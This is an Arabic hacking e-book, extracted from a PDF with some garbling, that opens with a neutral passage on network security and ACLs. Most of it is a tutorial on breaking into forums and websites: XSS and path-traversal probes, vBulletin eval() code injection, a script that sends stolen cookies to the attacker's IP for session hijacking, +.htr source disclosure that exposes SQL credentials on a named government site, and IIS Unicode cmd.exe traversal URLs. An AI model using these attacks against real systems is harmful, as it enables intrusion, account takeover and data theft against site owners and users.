‎٤‎‏-شرحلمكونا ت ACL.<br />

‎٥‎‏-شرح لعملیةتفح صالتراخی ص.‏<br />

أي شبكةقدتكونعرضةللوصول غیر المرخ صلأي مما یلي:‏<br />

<strong>١</strong>- المعدات.‏<br />

- ٣ البیانات.‏<br />

- ٣ عملیاتالشبكة.‏<br />

٤- الموارد.‏<br />

تعتمد درجةأمن الشبكة على<br />

مدى حساسیةالبیانات المتداولة عبرالشبكة.‏<br />

ویتمتنظیمالأمن وفقالنو ع الشبكة ‏،ففي شبكاتالندللندكل جهازیتحكمفيأمنهالخا ص ‏،بینمایتحكم<br />

المزودفيأمن شبكات الزبونالمزود.‏<br />

و هناك بع ضالإجراءاتالتيتساعدفيالمحافظة علىأمنالشبكة:‏<br />

<strong>١</strong>- التدریبالمتقنللمستخدمین على التعامل معإجراءات الأمن.‏<br />

‎٢‎‏-التأكد منأمن المعداتوصعوبةالوصولالیها منقبل غیرالمخولین.‏<br />

- ٣ حمایةالأسلاكالنحاسیة وإ خفاءها عن الأعینلأنهاقدتكون عرضةللتجسس.‏<br />

‎٤‎‏-تشفیرالبیانا ت عندالحاجةأما مقاییسالتشفیر فتضعها وكالةالأمن الوطنيالأمریكیة National<br />

Security Agency (NSA).<br />

‎٥‎‏-تزویدالمستخدمین بأجهزة لاتحتوي على محركات أقرا ص مرنةأو مضغوطةأو حتى أقرا ص صلبة ،<br />

و تتصل هذه الأجهزةبالمزوداتباستخدام رقاقةإقلاع ROM Boot Chip و عندتشغیل هذه الأجهزة<br />

یقوم المزود بتحمیلبرنامجالإقلا عفي ذاكرة RAMللجهازلیبدأبالعمل.‏<br />

٦<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‎٦‎‏-استخدامبرامج لتسجیل جمیعالعملیاتالتيیتمإجراؤها علىالشبكةلمراجعتها عند الضرورة.‏<br />

٧ ‏-إعطاءتصاریح Permissionsللمستخدمینللوصولللبیانا ت و المعداتكل حسب طبیعة عمله و<br />

في هذه الحالة یجب مشاركةالبیانات و المعدا تللسماحللآخرینباستخدامها.‏<br />

‎٨‎‏-تزویدالمستخدمینبحقو ق Rightsتحدد الأنشطة و العملیاتالمسموحلهمإجراءها علىالنظام.‏<br />

هناك نظامانأساسیان لإعطاء التصاریح والحقوق<br />

- <strong>١</strong> المشاركةالمحمیة بكلمة مرور.‏<br />

٢ ‏-تصاریح الوصول.‏<br />

:<br />

في النظام الأولیتمتعیینكلمة سرلكل منالمواردالمطلوب<br />

منقبل منلدیهكلمةالسر.‏<br />

مشاركتها ویتم الوصوللهذه المواردفقط<br />

كماتستطیعتحدید درجةالوصولهل هيللقراءةفقطأم وصولكاملأم وفقالكلمة السر.‏<br />

في النظام الثانيیتمتعیینالحقوق وإعطاءالتصاریحلكل مستخدمأو مجموعة مستخدمین ، و یكفيأن<br />

یدخل المستخدمكلمة المرور عند الدخولالى نظام التشغیللیتعر ف النظام على حقوق هذا المستخدم و<br />

التصاریحالمتوفرةله،‏ ویعتبر هذاالنظامأكثرأمنا منالنظامالسابقویعطي مدیرالشبكةتحكماأكبر بكل<br />

مستخدم.‏<br />

عندإدخالالإسم وكلمةالمروریتمتم ریر هذهالمعلومات الى مدیرأمن ال حسابات Security<br />

فإ ذاكانالولوجالى جهاز Workstationفإ نالمعلوماتیتم<br />

مقارنتها معقاعدةبیانات حساباتالأمنالم حلیةفيالجهاز،أماإ ذاكانالولوجالى نطاق Domainفإن<br />

المعلوماتیتمإرسالها الىمزود SAM الذي یقارنها معقاعدةبیانات حساباتالنطاق ‏،فإ ذاكاناسم<br />

المستخدمأوكلمةالمرور غیر صال حینفإ ن المستخدم یمنع منالدخولالىالنظام،أماإ ذاكانا ص حی حین<br />

فإن نظام الأمن الفرعي یقومبإ صداربطاقة ولوج Accessتعر Token فالنظامبالمستخدم فترة<br />

ولوجه وتحتوي هذه البطاقة على المعلوماتالتالیة :<br />

Accounts Manager (SAM)<br />

-٢<br />

- <strong>١</strong> المعر ف الأمني (SID) Security Identifier وهو رقمفرید خا ص بكل حساب.‏<br />

معرفات المجموعة Group SIDs وهي التيتحددالمجموعة التي ینتميلهاالمستخدم.‏<br />

‎٣‎‏-ا لإمتیازا ت Privileges و هيتمثل الحقوق الممنوحةل حسابك.‏<br />

كماأنهیتمإ صدار Access Token عند محاولتكالإتصال من جهازكبجهاز آخر على شبكتك و یطلق<br />

على هذاالإجراءالولوج عن بعد Logon. Remote<br />

منالأمورالتي یجب مراعاتها عندالحدیث عنأمنالشبكةهوالمحافظة علىأمنالموارد مثلالطابعا ت و<br />

محركاتالأقرا ص و الملفات و التي یقو م مدیرالشبكة بتعیینتصاریح لإ ستخدام هذهالموارد.‏<br />

و من التصاریح التيقدتعطىللوصول الى الملفات ما یلي :<br />

٦٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‎<strong>١</strong>‎‏-تصریحقراءة و یسمحلك بعر ض و نسخالملفا ت.‏<br />

‎٢‎‏-تصریحتنفیذللتطبیقا ت.‏<br />

‎٣‎‏-تصریح كتابة و یسمحبالتعدیلفي محتو ى الملفا ت.‏<br />

٤- ممنوع ا لإ ستخدام Access. No<br />

والتصاریح ممكن منحهالمستخدمأو مجموعة منالمستخدمین و هذاأٍ‏ سهل.‏<br />

یمتلككل مورد من المواردقائمةتحكمبالوصول (ACL) Access Control List وكلمعلومةیتم<br />

إدخالهافي ACLیطلق علیها (ACE). Access Control Entry<br />

یتمإنشاء ACE عند منحالتصریح لإ ستخدامالمورد وتحتوي على SIDللمستخدمأو مجموعته<br />

الممنوحةالتصریحبالإ ضافة الى نو عالتصریح،فلو افترضناأن مدیر مجموعة ماقد مُنحتصریحقراءة و<br />

تصریح كتابةلمل ف مافإن ACE جدیدیتمإنشاؤهثمإ ضافتهالى ACL الخا صبالمل ف و سیحتوي<br />

ACEعلى SIDلمدیرالمجموعةبالإ ضافةالىتصریحقراءة وتصریح كتابة.‏<br />

هناك نوعان ل : ACE<br />

‎<strong>١</strong>‎‏-الوصول مسمو ح AccessAllowed.<br />

٢- الوصول ممنو ع AccessDenied ویتمإنشاؤهاإ ذاكانتصریحالوصول هو Access. No<br />

و هكذا عندما یحاول مستخدم ماالوصولالى مورد مایتم مقارنة SID الخا صبه مع SIDsفيكل<br />

ACEمن ACLللمورد.‏<br />

في ویندوز NT و ویندوز ‎٢٠٠٠‎یتمترتیب ACEب حی ثتكون AccessDeniedقبل ACEs<br />

فإ ذا وجد SID<br />

فستمنع من الوصول الىالمورد وإلافسیبحثفي AccessAllowedللتأكد ACEs منالحقوق<br />

الممنوحةلكفإنلم یعثر على SID مطابقلخاصتكفستعر ض رسالةتحذیرتمنعك منالوصولللمورد.‏<br />

خاصتكفيأي من AccessDenied ACEs<br />

AccessAllowed ACEs ،<br />

ملخ صالدرس:‏<br />

هناك بع ضالإجراءات التي یجب اتخاذهاللمحافظة علىأمن الشبكة و منها:‏<br />

تدریبالمستخدمین ، حمایة المعدا ت ‏،تشفیرالبیانا ت ‏،استخدامأجهزة عدیمة الأقرا ص ، مراقبةالعملیات<br />

التيتجرى علىالشبكة.‏<br />

هناك نظامانأساسیان لإعطاءالتصاریح والحقوق<br />

<strong>١</strong>- المشاركةالمحمیة بكلمة مرور.‏<br />

٢ ‏-تصاریح الوصول...‏<br />

:<br />

٦٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏"درس مفصل عن كیفیة اختراق المنتدیات وطرق حمایتها"‏<br />

$$$$$$$$$$$$$$<br />

الكاتب:العقرب الأحمر<br />

$$$$$$$$$$$$$$<br />

الدرسیتكون من ٧ نقاط<br />

ا-لمنتدیات وانواعه<br />

طریقةاختراقه<br />

‎٣‎‏-أختراق ال<br />

سرفراتالویندوز ودورهفياختراق المنتدیات<br />

‎٥‎‏-النسخه المنتشرهفي النت ودورالمعربین العرب وحقیقةالموضو عوتعریبهم<br />

٦ ‏-الحمایه منالمخترقینبنسبة 80% لااجهزتكم ومنتدیاتكم<br />

- ٧ المجلهبجمیع نسخهقابل لاال ختراق<br />

SQL<br />

<strong>١</strong><br />

-٢<br />

-٤<br />

الدروس جمیعهابالصورة وحقائق ودلائل<br />

قمت بتجمیع الدروس والاضافتة علیهوتعدیله‎100%‎<br />

ارجو عدم نقلالدروس وكوبي<br />

*************************************************************************<br />

<strong>١</strong>- المنتدیات وانواعه<br />

^^^^^^^^^^^^^<br />

٢<br />

المنتدیاتاولا منتدیات جون Poweredبجمیعاصداراته by: vBulletin<br />

‎<strong>١</strong>‎لماذالم یخترقاحدي منتداهم حتيالان<br />

الایوجدلهم ملیون عدو<br />

‎٣‎الایخترقون عشراتالمنتدیات یومیا ولماذالیس منتدي جون وحمایتهتصلالي ‏%‏‎60‎في السرفر<br />

تفضل هذاثغراتبموقعهماشوي شغلكمانتصللقلبهم لاارید التطویلالانبس مثاللمن یفهمه<br />

http://www.<strong>vb</strong>ulletin.org/index.php?topic=<br />

alert(document.cookie)<br />

2<br />

http://www.<strong>vb</strong>ulletin.org/index.php?<br />

|=forum/view.php&topic=../../../../../../../etc/passwd<br />

٦٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

******************************************************************************<br />

طریقةاختراقه<br />

^^^^^^^^^<br />

جمیعالاصدارات<br />

فلنبدي من صفر نسخة <strong>١</strong><strong>١</strong>٣ بتذكرو یمكن بعضكم<br />

كلنانعر ف منتدیات الفيبي ، وهذا النو ع من المنتدیات یحب یركبهقلیلین الخبرهفيأغلب الأحیان ، وهذا<br />

-٢<br />

المنتد ى هوالمعرو ف عندناالعرب بكثره<br />

الأول اللي كتبهالفرنسي ‏(على ماأعتقد ) Jouko Pynnonen<br />

) is a <strong>com</strong>monly used web forum http://www.<strong>vb</strong>ulletin.<strong>com</strong>/vBulletin (<br />

system written in PHP. One of its key features is use of templates,<br />

which allow the board administrator to dynamically modify the look of<br />

the board.<br />

vBulletin templates are parsed with the eval() function. This could be<br />

somewhat safe as long as the parameters to eval() are under strict<br />

control. Unfortunately this is where vBulletin fails. With an URL<br />

crafted in a certain way, a remote user may control the eval()<br />

parameters<br />

and inject arbitrary PHP code to be executed.<br />

A remote user may thus execute any PHP code and programs as the<br />

web<br />

server user, typically "nobody", start an interactive shell and try to<br />

elevate their privilege. The configuration files are accessible for the<br />

web server so the user can in any case access the MySQL database<br />

containing the forums and user information.<br />

According to the authors the vulnerability exist in all versions of<br />

vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer<br />

overrun or other platform-dependant issues, so it's presumably<br />

exploitable under any OS or platform.<br />

DETAILS<br />

=======<br />

vBulletin templates are implemented in the following way: the<br />

gettemplate() function in global.php is used to fetch a template from<br />

٦٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

database. The code is then passed to eval(). If we take index.php for<br />

an example, there's this code:<br />

if ($action=="faq") {<br />

eval("echo dovars(\"".gettemplate("faq")."\");");<br />

}<br />

The dovars() function does some variable replacing, such as replace<br />

with .<br />

The gettemplate() function is defined in global.php:<br />

function gettemplate($templatename,$escape=1) {<br />

// gets a template from the db or from the local cache<br />

global $templatecache,$DB_site;<br />

if ($templatecache[$templatename]!="") {<br />

$template=$templatecache[$templatename];<br />

} else {<br />

$gettemp=$DB_site->query_first("SELECT template FROM template<br />

WHERE title='". addslashes($templatename)."'");<br />

$template=$gettemp[template];<br />

$templatecache[$templatename]=$template;<br />

}<br />

if ($escape==1) {<br />

$template=str_replace("\"","\\\"",$template);<br />

}<br />

return $template;<br />

}<br />

For effectiveness the function implements a simple cache for template<br />

strings. After fetching them from the database they're stored in the<br />

templatecache[] array. This array is checked for the template before<br />

doing the SQL query. Unfortunately the array is never initialized, so<br />

a user can pass array contents in the URL, e.g.<br />

(for simplicity not %-escaped)<br />

٦٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

http://www.site.url/index.php?action=faq&templatecache<br />

[faq]=hello+world<br />

With this URL, you won't get the FAQ page, but just a blank page<br />

with the words "hello world".<br />

The eval() call above will execute<br />

echo dovars("hello world");<br />

As if this wouldn't be bad enough, a remote user may as well pass a<br />

value containing quotation marks and other symbols. Quotation marks<br />

aren't always escaped as seen in the code above, in which case<br />

index.php could end up executing code like<br />

echo dovars("hello"world");<br />

This would produce a PHP error message due to unbalanced quotes. It<br />

doesn't take a rocket scientist to figure out how a remote user could<br />

execute arbitrary code from here, so further details about exploitation<br />

aren't necessary. If your vBulletin board produces an error message<br />

with an URL like the one above prefixed with a single quotation mark,<br />

it's definitely vulnerable.<br />

The above example works with the "Lite" version. The <strong>com</strong>mercial<br />

versions<br />

are vulnerable too, but details may differ. After a little experimenting<br />

on the Jelsoft's test site I found some of the <strong>com</strong>mercial versions also<br />

have an eval() problem with URL redirecting, e.g.<br />

"world http://www.site.url/member.php?acti...ypass&url=hello<br />

and a similar one in the Lite version:<br />

http://www.site.url/search.php?acti...s&templatecache<br />

[standardredirect]=hello"world<br />

تعرفونالكلام هذا ولا داعي لترجمه ، منالكلام هذاأنت ممكنترسلأكواد خل ف urlتنفذفيالسیرفر ،<br />

تضعهابدل الكلمه hello+world الغبیه ‏،جرب مثلا<br />

:<br />

<strong>١</strong>- ركبفي جهازك ملقم ویبأي ملقمتحبه ممكنتركب علیه <strong>vb</strong> 113 or 115<br />

٩٠ عندكفي جهازك ‏(طریقه فت حالبورتتكون على مجازك (<br />

٣ ‏-أرسل ال url هذا الىالسیرفر<br />

٢- أفتحالبورت<br />

٦٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

search.php3?action=simplesearch&query=searchthis&templatecache[s<br />

tandardredirect]="%29%3B%24fa="


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

وأعذروني علىالإملاء والنحو<br />

ملاحظهأخیره : وهي عند ماتشبك معالسیرفر عن طریقالبورت ‎٩٠‎أرسل<br />

-d downloads<br />

تنزللكالداتبی سكلها ، وللأس ف طلعت غیر مشفره وهذا یدل علىالتخل ف ، ولكنفي الإ صداره‎٢٫٢‎ x<br />

شفرت ولكنكسرتها وقریبا أقوللك عنها<br />

تم شرح طریقة الاختراق من ‎<strong>١</strong><strong>١</strong>٣‎الي <strong>١</strong><strong>١</strong><br />

طریقةاخترا ق من ‎<strong>١</strong><strong>١</strong>٥‎الي ٢٢٥<br />

المتطلبا ت)‏ WebServer ‏:تركیب سیرفر على جهازكالشخصي)‏ + متصفحانترن ت)‏ اكسبلورر)‏ .<br />

المستوى : متوسط<br />

ملاحظة : هذهالطریقةلس تلل vBulletinفقط ‏!!یمكنانتجربها علىانواعاخرى من المنتدیات<br />

.<br />

----------<br />

:<br />

---------<br />

الثغرة<br />

تنقسم طریقةالعملالى عدةاقسام ‏..أولا بع ض السكربتاتالخبیثةالتيتسرقالكوكیزبالاضافةالىجعل<br />

المنتدى یستقبل<br />

بیانات من مكان خاطيء ‏..لكن یشترطان یسمح المنتد ى بأكواد ال .. HTML<br />

قم بكتابة موضو ع جدیداو رد<br />

هذا الكود<br />

‏(في منتد ى یدعمال .. ) HTMLثماكتباي موضو ع والص قبینالسطور<br />

:<br />

document.write('';<br />

مع ملاحظةتغیرال IP Adress الى رقمال IP الخا صبك .<br />

. (<br />

وعندما یقوم شخ ص ما بقراءة محتو ىالصفحةفانالسكربتالذيقمنابوضعه سیقوم بتنفیذالاوامرفي<br />

جهازه وقراءةجزء مناحد ملفاتالكوكیزالتيتحتوي علىالباسورد الخاصةبالمنتدى ‏..ثم یقوم<br />

السكربت بتحویل هذهالسطورالى رقم الايبيالذيقمنا بكتابته سابقا ‏(مع ملاحظةانه یجبان یكون على<br />

جهازي سیرفر مثل IIS او غیرها<br />

او Apache<br />

وبعدان تتمالعملیةبنجاحقم بفتح مل فال Log الخا صبالسیرفر الذي یحتویه جهازك<br />

مثاللوكانالسیرفراباتشي<br />

ستجد جمیعالاوامرالتي طلبتها منالسیرفر ‏..إلخ<br />

..<br />

.. فتاح المجلد Apche واختر logs واختر . Log Acces<br />

اب حث عنالكودالخا<br />

صبالباسورد<br />

: مثال<br />

..<br />

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb<br />

٦٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ddf90622;%20sessionhash=a<br />

4719cd620534914930b86839c4bb5f8;%20bbthreadview[54<br />

20]=1012444064;%20bblastvi<br />

sit=1011983161<br />

فكرقلیلاالان ‏..این الباسورد ؟؟<br />

الباسورد موجودةلكنبطریقة مشفرة یصعبكسرها ‏..اذن مالحل ؟<br />

قمبنسخالكود الذي وجدته والصقهفيالمتصفح ‏..بهذا الشكل<br />

http://www.victim.<strong>com</strong>/<strong>vb</strong>/index.php?bbuserid=<br />

[userid]&bbpassword=[password hash]<br />

ستجد عبارة : ‏"أهلا بعودتك یا ‏(اسمالذي سرقت منهالكوكیز....)‏ "<br />

في هذه الحالةانتالانتستطیع التحكم بكل شي وكانك مدیرالمنتدى الذي سرقت<br />

لكننا نحتاج الىكلمة المرورللدخولالىلوحة التحكم ‏..اذهب الى التحكم)‏ وقم بتعدیلالبریدالالكتروني<br />

الىبریدك الخا ص وثمقم بتسجیل الخروج<br />

تستطیعاستقبالبرید یحتويباسوردالادمن<br />

) منهالكوكیز)‏ ..<br />

)<br />

‏..ثماذهب الىاداة .. Password Forgot وعندها<br />

..<br />

**********************************************************************************<br />

SQL<br />

^^^^^^^^^^^^^<br />

‎٣‎‏-أختراق ال<br />

:<br />

یمكنكاستخدامبرنامجالعقرببیكوناسرعلمنلدیه نسخ منه<br />

س فيالبدایة ماهيالاسكیوال(‏ ( SQL ؟؟<br />

الاسكیوال هي عبارة عنقاعدبیاناتتحتوي على جداول واغلب المواقعالتيتكون صفحاتها منتهیة ب<br />

ASPهي صفحا تتسحببیاناتها منقاعدة SQLوصفحات ASP ممكنانتكونكنز منالمعلومات<br />

لاختراققواعدبیانات SQL وهذا ماسو ف اشیرالیه لاحقا ، و SQL تتنصت علىالبورت <strong>١</strong>٤٣٣<br />

ایضا مااریداناخبركبهانال SQLقدتحتوي على اكثر منقاعدةبیانات وكلقاعدةبیاناتتحتوي<br />

على عدد من الجداول یمكن ان تتصوركبرقواعدبیانات SQL والعددالكبیر منالبیانات التىتحتویها<br />

س مالذي یمكناناستفید منهاذااخترقتقاعدةبیانات SQL؟<br />

هذا على حسب نشاطالموقعاذاكان هذا الموقع منتد ى لااقصد منتدیات PHPبل منتدیات ASPفي<br />

الغالب سو فت حصل على جمیعاسماء<br />

المستخدمین وكلماتالسر وبامكانكتعدیل وحذ فاي موضوع وصلاحیاتلمتكنت حلمبها ‏،امااذاكان<br />

الموقع یحتوي على میزة<br />

قائمةالمراسلا تفسو فت حصل علىاعداد خیالیة منالایمیلات ، عندهاقمبانشاء شركةللدعایة والاعلان<br />

وسو فتصبحثریااذنلاتنسى LinuxRay_<br />

توقعانتجد اي شئ داخلقواعدبیاناتمعلوماتاشخا ص ‏-ارقام هوات ف<br />

.<br />

- عناوین ‏-تورایخالمیلاد ،<br />

ممكنانتصبح . Administrator<br />

:<br />

اعر فانهقداصابك المللالانلكناستعد نشاطك من جدیدفالطریق مازال طویلا<br />

س مالذيتحتاجةللدخول علىقواعدبیانات SQL؟<br />

...<br />

:<br />

تحتاجفقطلل User Name و Passwd<br />

س<br />

: منایناحصل علىاسم المستخدم وكلمةالمرور ؟<br />

٧٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

هناك طرق عدیدةلل حصول على User name and Passwd منهاكمااسل ف صفحاتال ASP<br />

وملفاتاخرى من نو ع sql‏.*هناكثغراتكثیریمكن<br />

انت حصل منها علىكلمات المرور مثلثغرة +.htr<br />

كی فتستخدم هذهالثغرة :<br />

http://target/page.asp+.htr<br />

: targetالموقعالهد ف<br />

asp صفحة Page :<br />

: htr‏.+الثغرة<br />

هذه الثغرةتقوماحیانا بفتح صفحةبیضاء لاتحتوي علىاي حر ف ‏....اعر فانك سوف تتساءل مالفائدة<br />

اذن منهاالفائدة هو خل ف هذهالصفحةالبیضاءاذهب الى Viewلكيتر Source ىاوامرالبرمجة<br />

الخاصة ب ASP التى لایمكنلكانتراهافي الوضع العادي مثل<br />

:<br />

Set DB= Server.CreateObject("ADODB.Connection")<br />

DB.Open "DRIVER=SQL<br />

Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer<br />

Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"<br />

< %<br />

%><br />

------------------------------------------------------------------<br />

في الكودالسابقترىاناسم المستخدمهو _LinuxRay<br />

وكلمة السرهي ٦٦٦٦٦٦٦<br />

------------------------------------------------------------------<br />

الشئالمضحكانهاحیانااذاكان هناك خطأفي صفحةال ASP مثلالاتي :<br />

AMicrosoft VBScript runtime error '800a01a8'<br />

Object required: 'Conn'<br />

/filename.inc, line 5<br />

هناك مل ف ینتهيبامتداد *.inc هذا ملف یحتوي علىاوامریتمتنفیذها من جانبالملقم ویحتوي علىاسم<br />

المستخدم وكلمة المرور<br />

اذن ماذاتنتظرقمبسحب هذا المل ف وذلكباضافةاسمالمل ففي عنوان الموقع .<br />

وممكنانتر ى مثل هذاالامرفي صفحة ASP<br />

٧<strong>١</strong>


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

عندتطبیقالثغرة علیها هذایعنياناوامرالبرمجة داخل مل ف database.inc<br />

<br />

وهناك عدة ملفاتتحتوي علىكلمةالمرور مثل ملفات<br />

global.asa<br />

++global.asa<br />

beforemilion-global.asa<br />

-global.asa<br />

milion.sql<br />

global-direct.asa<br />

لی س منالضرورةانتكونالملفاتبهذهالاسماءلكن هذا هوالمعتاد علیه منقبل مبرمجین SQL<br />

وكل<br />

ماعلیكفعلهانتكتباسمالصفحة مثلالاتي :<br />

global.asa+.htr<br />

هناكثغرةقدیمةفي IIS 3 وهيانتضی ف بعد صفحة ASP هذاالرمز data‏$::كما یلي<br />

file.asp::$data<br />

هذه الثغرةلاتعملالا على IISفلا 3 تتعب نفسك بتطبیقهافقطللعلم لا اكثر .<br />

لقداقتربنا من النهایة<br />

... ماذا بعدال حصول علىاسم المستخدم وكلمة المرور ؟؟<br />

بعدهاالدخول علىقاعدةال !! SQL<br />

هناك عدةبرامجتدخل علىقاعدةالبینا تانااستخدم Visualلكني interdev 6.0 مازلت افضل<br />

استخدام البرنامجالسهل ACCESS 2000<br />

كل ما علیك فعلههو فتح البرنامح الذهاب الىقائمة<br />

File<br />

اختر<br />

New<br />

ومنقائمةالملفات الجدیدةاختار<br />

.<br />

Project (Exiting Data)<br />

اي مشرو عقاعدةبیانات موجودة<br />

سیظهرلك مربع لانشاء الملفاختر<br />

Create<br />

٧٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

ايانشاء<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

الان ستر ى مربع<br />

Data Link Properties<br />

تحتاجفق طلثلا ثمعلوما تاسم الموقعاوالايبي ‏-اسمالمستخدم ‏-كلمة المرور<br />

‎<strong>١</strong>‎‏-ادخلاسمالموقعفي صندو ق Select or enter server name<br />

‎٢‎‏-اسمالمستخدمفي User Name<br />

‎٣‎‏-كلمة السر Password<br />

ملاحظة ‏(قم بإزالةالصح من مربع Password) Blank<br />

اضغطفي البدایة على Testفيالاسفل Connection لاختبارالاتصال بقاعدة البیانا تاذا رأیت هذه<br />

العبارة Test Connection Succeeded<br />

فمعناهانالاتصال بقاعدةالبیاناتتمبنجاح.‏<br />

یمكنكالانانتختارايقاعدةبیاناتترید الدخول الیها منالقائمةالمسندلة<br />

:<br />

Select the data base on the server<br />

واضغط على OK او موافق .<br />

فئ رانالتجارب<br />

موقع<br />

:<br />

http://www.moe.gov.sa/<br />

‏-‏‎1‎قمبالدخول علىالصفحة التالیة :<br />

http://www.moe.gov.sa/news_admin.asp<br />

سترى مایلي<br />

Microsoft VBScript runtime error '800a01a8'<br />

Object required: 'Conn'<br />

/news_admin.asp, line 7<br />

ثم طب ق علیهاثغرة htr كتالي:‏<br />

http://www.moe.gov.sa/news_admin.asp+.htr<br />

٧٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

اذهبالى السورس لترى<br />

< ! --#include file = "database.inc"--><br />

قمبسحب<br />

ملف database.inc كتالي:‏<br />

http://www.moe.gov.sa/database.inc<br />

سو فترى مایلي<br />

Set DB= Server.CreateObject("ADODB.Connection")<br />

DB.Open "DRIVER=SQL<br />

Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer<br />

Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321"<br />

:<br />

<br />

هلتعر ف مالذيامام عینكالانانهاسم المستخدم وكلمةالمرور<br />

انااعر فان لااحد یحب مادة<br />

الكیمیاء .<br />

..... سار عبالتشبیك علىقاعدةالبیانات<br />

فأرالتجارب الثاني<br />

موقع<br />

http://www.itsalat.<strong>com</strong>/<br />

1 - User name : sa Passwd : sp2000<br />

:<br />

********************************************************************************<br />

-٤<br />

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />

سرفراتالویندوز ودورهفياختراق المنتدیات<br />

ن حن الهكرز واي هكرز مبتديیعر فثغرات الویندوز جیدا دا<br />

وهي نظامفاشل ٨٠% وثغراتهبالاالو ف<br />

ولاانصحايا خلدیه منتدي وموقع یستضیف سرفرات ویندوز راحاقلكملی شبااثبتات<br />

صور‎٢‎ هو صورةلجمعیةامریكي مهم وحجمقاعداتالبیانات ‎<strong>١</strong>٫٥‎كیكیعني 15000<br />

خمسة ملین مشتركتماختراقهالبارحهبنفسي جاريتحمیل الموقعلجاهزيكاملا<br />

میك ویحتوي علي<br />

‎<strong>١</strong>‎‏-ثغراتالهتمل<br />

‎٢‎‏-الفرون تبیج<br />

٧٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

-٣<br />

IIS<br />

مخلفاتالافتبي والاستفاد منهكثیرلهكرز<br />

‎٤‎‏-ثغراتالبرامج<br />

٥- عدمتمكن حمایةالنظام‎100%‎<br />

لاذلكانصحالاخوهبالابتعاد عن سرفرا تالویندوز وبرامجهم<br />

بدایةنعر ف ماهي<br />

هي خدمه متواجدةفي ویندوزالفینبروفشنال وویندوزانتيIIS ال<br />

‏...‏IIS5.0‎وویندوزالفین یمتلك الاصدارةالخامسة من ملقممعلوماتالانترنت<br />

بسماالله نبدأ<br />

توجد نقطة ضع ففيالاياياس ‎٤‎او ٥ وهذهالنقطةتستغلبطریقة سهلة جداً‏<br />

وتسمى هذه النقطةبالیونیكود<br />

وتنفیذها سهلاً‏ لایحتاجالى خبرة عمیقةفي مجالاختراق المواقع<br />

ولكن نق ف عند هذه النقطةللمبتئیدئن<br />

المبتدئین عامةً‏ یفكرونالانفياختراق عدة مواقع شهیرةبهذهالطریقة<br />

ولكن لا هذهالطریقة غیر مجدیة معالمواقع الشهیرةاو غیرالشهیرة<br />

لان نقطة الضع ف هذهلاتوجدالافي ویندوزالفیناوانتي<br />

وأغلبالمواقعالشهیرةتستخدمانظمةالیونكس واللنكس<br />

أيان ویندوزانتي اوالفین نظام حمایته محدودة وكل یومتطلعثغرات جدیدة<br />

لكنبوسع مدراءالمواقع ایقا ف نقطةضع ف من نقاطالاضعا ف الموجودةفيالانتي<br />

لكن بتلكالطریقةقد یكونونجعلو حاجزاًلهم منالهكرة<br />

ولكنلیس دائماً‏<br />

وتنفذ من داخلالمتصفح<br />

وطریقةتنفیذالثغرةكالاتي<br />

:<br />

../winnt/system32/cmd.exe?/c+dir+c:\ http://www.xxxxxx.<strong>com</strong>/scripts/..Á<br />

ركزوهناالان بعد دوتكومبدأ تتنفیذ الثغرة<br />

وبإ مكانكأیضا دخولاي مل ف ولیسفقط رؤیة السي:‏c هذهالثغرةتسمحلكب عر ض جمیع ملفات<br />

وتوجدأكثر منثغرة وهي<br />

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

